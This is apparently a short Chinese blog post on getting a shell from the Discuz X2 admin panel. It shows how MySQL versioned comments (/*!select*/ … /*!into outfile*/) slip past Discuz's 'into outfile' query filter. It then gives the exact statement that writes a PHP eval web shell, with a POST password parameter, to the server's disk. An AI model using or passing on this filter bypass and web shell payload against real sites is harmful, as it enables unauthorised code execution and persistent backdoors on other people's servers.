Discuz X2 后台getshell 鸡肋

最近帮朋友看了一个站,DZx2的,拿到了创始人都没办法getshell

百度无果,自己本地架设了一下

1,当mysql是root时

站长---数据库---升级

尝试

select '1' into outfile 'E:\2.txt'

会提示

[Type] 查询语句安全威胁

[Query] select '1' into outfile 'E:\2.txt'

为什么会这样呢?

\config\config_global.php中

限制了into outfile函数

尝试绕过

/*!select*/ '1' /*!into outfile*/ 'E:\3.txt'

Discuz! 数据结构升级成功,影响的记录行数 1

如果要导出一句话,即

/*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'E:\3.php'

注意:一句话密码不要有引号

发表评论